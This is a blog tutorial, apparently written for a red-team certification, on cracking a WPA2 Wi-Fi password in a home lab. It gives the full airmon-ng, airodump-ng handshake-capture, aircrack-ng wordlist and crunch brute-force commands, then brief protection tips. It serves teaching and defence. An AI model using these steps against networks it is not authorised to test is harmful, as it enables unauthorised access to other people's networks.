Blog — Cracking WPA/WPA2 Passwords (home lab)
In today's Technology world protecting from online threats is as much important as Physical threats. In the past few years, the usage of the internet has grown rapidly along with this threat and cyber crimes are also increasing. So one has to know how to protect them-self from this threat.
One of the main access points to connect to the internet is wifi routers. Wifi routers are now can be found in hotels, homes, offices, and other public places. Most of them are vulnerable to attack. In this blog ill share step by step to crack WPA/WPA2 wifi passwords. This is for education purposes only.
This blog I wrote as a part of the Red-teaming master certification from Hackeru.
About WEP, WPA, and WPA2
To improve the functions of WEP (Wired Equivalent Privacy), WiFi Protected Access or WPA was created in 2003. This temporary enhancement still has relatively poor security but is easier to configure. WPA uses Temporal Key Integrity Protocol (TKIP) for more secure encryption than WEP offered.
A year later, in 2004, WiFi Protected Access 2 became available. WPA2 has stronger security and is easier to configure than the prior options. The main difference with WPA2 is that it uses the Advanced Encryption Standard (AES) instead of TKIP.
DISCLAIMER. This article is for learning purposes, we are not responsible for any harm caused while referring to it.
1. Lab Setup
a. Attacker machine — Kali Linux.
b. Wifi adapter which supports monitor mode
c. Wifi router(using my own router)
2. Capture Traffic and Handshake
Connect wifi adapter to the host Kali machine.
Check the adapter interface by typing “iwconfig” command
Note: run the following commands as a root
Run the following command
airmon-ng check kill
This command stops network managers then kill interfering processes left
Then enable the monitor mode by entering the following command
airmon-ng start wlan0
then make sure monitor mode is active on wifi adapter by “iwconfig” command
Managed mode is the default mode for all wireless devices.
The reason why we need to change the mode from managed to monitor mode is that we not only want to capture the packets that have the mac address to our device but all the packets, even those sent to the router and other devices. This is only possible when the WiFi adapter is in monitor mode.
Then to check all the following available network around you enter the following command
airodump-ng wlan0mon
Capture the handshake
airodump-ng -c 2 — bssid 12:84:52:9E:9C:54 -w wpa2handshake.cap wlan0mon
- -c : channel of router
- — bssid : bssid of router
- -w : captured output file
After successfully capturing the handshake we can move to the next step
i.e brute-forcing the password using a dictionary attack.
aircrack-ng wpa2handshake-01.cap -w /usr/share/wordlists/rockyou.txt
- wpa2handshake-01.cap: its a network capture file
- rockyou.txt: it is a password dictionary file that contains millions of password
After running the script aircrack is able to find the password which is
“9876543210”
Note: if the password is not available in the dictionary we can use “crunch ”to generate passwords using different combinations.
An example to use crunch is shown below
crunch 10 10 0123456789 -t 876%%%%%%% | aircrack-ng wpa_challenge-01.cap -w- -b C4:E9:0A:DD:CC:50
Protection from wifi attacks:
After learning the attack we should also learn how to protect from these types of attacks.
- Make wifi password protected.
- Use WPA/WPA2 encryption instead of WEP.
- Choose a strong password which is a combination of uppercase, lowercase, number, and special character.
The below chart tells how much time is required to crack the password for different complexities.